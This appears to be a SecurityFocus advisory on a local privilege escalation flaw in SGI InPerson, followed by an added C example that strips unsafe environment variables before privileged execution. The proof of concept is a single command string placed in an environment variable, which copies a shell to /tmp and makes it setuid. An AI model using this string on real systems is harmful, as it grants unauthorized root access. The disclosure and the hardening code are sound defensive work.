SGI InPerson Local Privilege Escalation Vulnerability

No exploit is required to leverage this issue. The following proof of concept has been provided:

Running the application when the 'SUN_TTSESSION_CMD' environment variable stores the following string will cause a setuid shell to be placed into the '/tmp' directory:
"cp /bin/jsh /tmp/jsh;chmod 6755 /tmp/jsh;killall -9 inpview,"

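One way a setuid program can keep a variable such as 'SUN_TTSESSION_CMD' away from anything it runs with elevated privileges, shown as an added example (not code from InPerson or from this advisory): build the environment from an allowlist instead of inheriting the caller's. The allowlist, the fixed PATH value and the function names are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical allowlist: the only variables the privileged program inherits. */
static const char *const ALLOWED[] = { "DISPLAY", "TERM", "LANG", "TZ", NULL };

/* Returns 1 if "NAME=value" names an allowlisted variable whose value
 * carries no shell metacharacters, else 0. */
int env_entry_allowed(const char *entry)
{
    const char *eq = strchr(entry, '=');
    if (eq == NULL || eq == entry)
        return 0;                       /* malformed entry or empty name */
    size_t nlen = (size_t)(eq - entry);
    for (size_t i = 0; ALLOWED[i] != NULL; i++)
        if (strlen(ALLOWED[i]) == nlen && strncmp(entry, ALLOWED[i], nlen) == 0)
            return strpbrk(eq + 1, ";|&`$<>()\n") == NULL;
    return 0;                           /* name not allowlisted: dropped */
}

/* Fills out[] (capacity cap, including the NULL terminator) with a fixed PATH
 * plus the allowlisted entries of in[]. Returns the number of entries kept. */
size_t build_clean_env(char *const in[], const char *out[], size_t cap)
{
    size_t n = 0;
    if (cap < 2) {
        if (cap == 1)
            out[0] = NULL;
        return 0;
    }
    out[n++] = "PATH=/usr/bin:/bin";    /* never inherit the caller's PATH */
    for (size_t i = 0; in[i] != NULL && n + 1 < cap; i++)
        if (env_entry_allowed(in[i]))
            out[n++] = in[i];
    out[n] = NULL;
    return n;
}

int main(void)
{
    /* Constructed sample environment; the command value is a placeholder. */
    char *sample[] = { "DISPLAY=:0", "SUN_TTSESSION_CMD=<attacker command>",
                       "PATH=/tmp:.", "TERM=xterm;id", "LANG=C", NULL };
    const char *clean[8];
    size_t kept = build_clean_env(sample, clean, 8);
    for (size_t i = 0; i < kept; i++)
        puts(clean[i]);   /* a real program would pass clean[] to execve() */
    return 0;
}
```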

 

Copyright 2010, SecurityFocus